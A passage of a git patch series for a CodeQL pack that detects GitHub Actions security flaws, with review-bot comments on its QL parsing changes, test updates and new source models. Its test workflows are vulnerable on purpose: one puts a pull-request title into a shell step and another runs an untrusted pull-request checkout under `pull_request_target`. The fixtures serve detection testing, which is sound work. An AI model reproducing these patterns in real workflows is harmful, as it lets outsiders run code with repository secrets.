.github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | From ef41db3ce51e254d6adc8c2ea58f8313965433a6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:58:24 +0200 Subject: [PATCH 500/707] Extract simple reference expression from ORed disjuncts --- ql/lib/codeql/actions/ast/internal/Ast.qll | 38 +++++++++++++++------- 1 file changed, 27 insertions(+), 11 deletions(-) 
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d9738cb74ad8..23b5ead7f0ef 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -153,17 +153,18 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { YamlNode key; YamlString value; string rawExpression; - string expression; + string fullExpression; int exprOffset; ExpressionImpl() { this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") - then expression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() - else expression = rawExpression.trim() + then + fullExpression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else fullExpression = rawExpression.trim() } - override string toString() { result = expression } + override string toString() { result = fullExpression } override AstNodeImpl getAChildNode() { none() } @@ -173,7 +174,9 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { override YamlNode getNode() { none() } - string getExpression() { result = expression } + string getExpression() { result = fullExpression } + + string getFullExpression() { result = fullExpression } string getRawExpression() { result = rawExpression } 
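Review bot: The new `getFullExpression()` and the retained `getExpression()` both return `fullExpression` with no QLDoc, so a reader cannot tell why two accessors exist or which one a subclass is expected to override. Suggested comments: `/** Gets the expression text without the enclosing ${{ }} delimiters and surrounding whitespace. */` above `getFullExpression()` and `/** Gets the expression this node represents; defaults to the full expression, subclasses may override to narrow it. */` above `getExpression()` — the second wording assumes a subclass override is the intent, which this hunk itself does not show. `ExpressionImpl` begins before the first hunk and continues past the second.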
@@ -1262,12 +1265,15 @@ class RunImpl extends StepImpl { */ bindingset[s] string getASimpleReferenceExpression(string s, int offset) { + // If the expression is ${{ inputs.foo == "foo" }} we should not consider it as a simple reference + // check that expression matches a simple reference or several simple references ORed with || + s.regexpMatch("([A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)(\\s*\\|\\|\\s*[A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)*") and // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.trim() .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) - .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", _) } bindingset[s] @@ -1319,18 +1325,28 @@ string getAJsonReferenceAccessPath(string s, int offset) { } /** - * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. + * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { + string expression; + SimpleReferenceExpressionImpl() { - exists(getASimpleReferenceExpression(expression, _)) or - exists(getAJsonReferenceExpression(expression, _)) + ( + expression = getASimpleReferenceExpression(this.getFullExpression(), _) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and + expression = this.getFullExpression() + ) } + override string getExpression() { result = expression } + abstract string getFieldName(); abstract AstNodeImpl getTarget(); + + override string toString() { result = expression } } class JsonReferenceExpressionImpl extends ExpressionImpl { 
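Review bot: The new full-match guard in `getASimpleReferenceExpression` tests `s`, while the existing `regexpFind` below runs on `s.trim()`, so an expression with leading or trailing whitespace is rejected by the guard even though the extraction would accept it; `s.trim().regexpMatch(...)` keeps the two consistent. The character class admits `'` and `\"`, so for `github.event.pull_request.title || "foo"` the literal `"foo"` is also returned as a simple reference, which the added comment says should not happen — a test pinning that disjunct would show whether it is filtered downstream. The change from `regexpCapture(..., 1)` to `regexpCapture(..., _)` is equivalent for a single group but reads as if several groups were expected; the explicit `1` was clearer. Because the guard is a full match, expressions that combine a reference with `&&`, a comparison, or function arguments containing commas or spaces no longer yield any simple reference, so references to untrusted contexts inside them are dropped from this path; presumably intentional given the comment, but worth confirming that such sources are still tracked elsewhere.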
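Review bot: The reworded QLDoc for `SimpleReferenceExpressionImpl` introduces the typo `sigcle`; it should read `A ${{}} expression accessing a single context variable such as steps, needs, jobs, env, inputs, or matrix.` The new `expression` field is bound once per ORed disjunct for simple references and to the full expression for JSON references, and the `getExpression()`/`toString()` overrides expose whichever value is bound; a one-line comment on the field such as `// One simple reference per ORed disjunct, or the full expression for JSON references` would make the multi-valued binding explicit. The abstract class is shown in full here; `JsonReferenceExpressionImpl`, which follows it, continues outside the hunk.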
@@ -1338,8 +1354,8 @@ class JsonReferenceExpressionImpl extends ExpressionImpl { string accessPath; JsonReferenceExpressionImpl() { - innerExpression = getAJsonReferenceExpression(expression, _) and - accessPath = getAJsonReferenceAccessPath(expression, _) + innerExpression = getAJsonReferenceExpression(this.getExpression(), _) and + accessPath = getAJsonReferenceAccessPath(this.getExpression(), _) } string getInnerExpression() { result = innerExpression } From 25a210734b223d1284b06cd2da2a45701cc6a1e7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:58:36 +0200 Subject: [PATCH 501/707] Update tests --- .../Security/CWE-094/.github/workflows/or.yml | 14 ------- .../CWE-094/.github/workflows/test12.yml | 13 +++++++ .../CWE-094/CodeInjectionCritical.expected | 2 + .../CWE-094/CodeInjectionMedium.expected | 1 + .../CWE-829/.github/workflows/test10.yml | 37 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 9 +++++ .../CWE-829/UntrustedCheckoutHigh.expected | 3 ++ 7 files changed, 65 insertions(+), 14 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml deleted file mode 100644 index bb873ca4eac8..000000000000 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: CI - -on: - pull_request_target: - -jobs: - test: - runs-on: ubuntu-latest - steps: - - run: | - echo ${{ inputs.github_event_pull_request_head_sha || github.sha }} - - - 
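Review bot: `JsonReferenceExpressionImpl` now derives `innerExpression` and `accessPath` from `this.getExpression()`, which `SimpleReferenceExpressionImpl` overrides in the same commit; if a subclass of that abstract class also covers JSON references, as the second disjunct of its constructor suggests, the value seen here depends on override dispatch resolving to the narrowed `expression`, which only coincides with the full text because the constructor binds it that way for JSON references. Using `this.getFullExpression()` here, as the `SimpleReferenceExpressionImpl` constructor already does, removes that dependency: `innerExpression = getAJsonReferenceExpression(this.getFullExpression(), _) and` / `accessPath = getAJsonReferenceAccessPath(this.getFullExpression(), _)`. The class starts and ends outside the hunk.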
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml new file mode 100644 index 000000000000..f81bef89568f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -0,0 +1,13 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.title || "foo" }}" + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 2097a589b5a3..4123359b5514 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -349,6 +349,7 @@ nodes | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -475,6 +476,7 @@ subpaths | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index ce4d74467f95..fa665b853884 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -349,6 +349,7 @@ nodes | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml new file mode 100644 index 000000000000..e8b5466f7516 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml 
@@ -0,0 +1,37 @@ +name: Build Android app (stripe) +on: + push: + branches: + - main + - fix-ci + workflow_dispatch: + pull_request_target: + branches: + - main + paths: + - 'custom-payment-flow/client/android-kotlin/**' + - '!**.css' + - '!**.md' + +jobs: + android_build: + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.after || github.event.pull_request.head.sha }} + + - name: Build + working-directory: custom-payment-flow/client/android-kotlin + run: | + ./gradlew build + + dependabot-auto-merge: + if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} + needs: android_build + permissions: + contents: write + pull-requests: write + uses: ./.github/workflows/wf_dependabot.yaml + secrets: inherit diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 711a529b179c..7313ffd9ae33 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -174,6 +174,7 @@ edges | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -207,6 +208,13 @@ edges | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
| +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | 
@@ -214,6 +222,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 3619941aa12e..b9cf0e547ca7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -15,6 +15,9 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 321e5504bc34945054ac2f13d76ae44e4f02e0aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:59:04 +0200 Subject: [PATCH 502/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0392a200bb40..45d91dcb7cc3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.41 +version: 0.1.42 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5b81393abdb4..a41aba954384 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.41 +version: 0.1.42 groups: [actions, queries] suites: codeql-suites extractor: javascript From b199fdc3e255b92dfe57434d6a6316323a6f0ef9 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 10:25:10 +0200 Subject: [PATCH 503/707] Add new models for file listing actions --- ...riHaximus_github-action-files-in-commit.model.yml | 9 +++++++++ .../ext/manual/ab185508_file-type-finder.model.yml | 10 ++++++++++ .../manual/ankitjain28may_list-files-in-pr.model.yml | 9 +++++++++ .../avraamMavridis_files-changed-action.model.yml | 10 ++++++++++ .../manual/jsmith_changes-since-last-tag.model.yml | 12 ++++++++++++ .../karpikpl_list-changed-files-action.model.yml | 8 ++++++++ ql/lib/ext/manual/knu_changed-files.model.yml | 11 +++++++++++ .../ext/manual/martinhaintz_ga-file-list.model.yml | 8 ++++++++ .../manual/rishabh510_path-lister-action.model.yml | 9 +++++++++ .../manual/the-coding-turtle_ga-file-list.model.yml | 8 ++++++++ .../ext/manual/w3f_action-find-old-files.model.yml | 8 ++++++++ ql/lib/ext/manual/yumemi-inc_changed-files.model.yml | 9 +++++++++ 12 files changed, 111 insertions(+) create mode 100644 ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml create mode 100644 ql/lib/ext/manual/ab185508_file-type-finder.model.yml create mode 100644 ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml create mode 100644 ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml create mode 100644 ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml create mode 100644 ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml create mode 100644 ql/lib/ext/manual/knu_changed-files.model.yml create mode 100644 ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml create mode 100644 ql/lib/ext/manual/rishabh510_path-lister-action.model.yml create mode 100644 ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml create mode 100644 ql/lib/ext/manual/w3f_action-find-old-files.model.yml create mode 100644 ql/lib/ext/manual/yumemi-inc_changed-files.model.yml 
diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml new file mode 100644 index 000000000000..e2009c888518 --- /dev/null +++ b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/WyriHaximus/github-action-files-in-commit + - ["WyriHaximus/github-action-files-in-commit", "*", "output.files", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml new file mode 100644 index 000000000000..119b4b1d814b --- /dev/null +++ b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ab185508/file-type-finder + - ["ab185508/file-type-finder", "*", "output.paths", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.names", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.extaddpaths", "filename", "manual"] + diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml new file mode 100644 index 000000000000..e3c9297cf233 --- /dev/null +++ b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ankitjain28may/list-files-in-pr + - ["ankitjain28may/list-files-in-pr", "*", "output.pullRequestFiles", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml new file mode 100644 index 000000000000..c14bc95c013d --- /dev/null 
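Review bot: The new model files are formatted inconsistently: this one and the `ankitjain28may`, `avraamMavridis`, `rishabh510` and `yumemi-inc` models end with two added blank lines, while the `karpikpl` and `knu` models start with an added blank line before `extensions:`. Trimming each to a single trailing newline and no leading blank line keeps the `ext/manual` directory uniform and avoids noise in later diffs. The `# https://github.com/...` comment per file is useful; a second short line recording why the listed outputs are modelled as `filename` sources (file names taken from a commit or pull request, if that is indeed the reasoning) would make the intent verifiable without visiting each repository.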
+++ b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/AvraamMavridis/files-changed-action + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES", "filename", "manual"] + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES_EXTENSIONS", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml new file mode 100644 index 000000000000..3a5cf8c8be2d --- /dev/null +++ b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/jsmith/changes-since-last-tag + - ["jsmith/changes-since-last-tag", "*", "output.files", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.added", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.modified", "filename", "manual"] + - 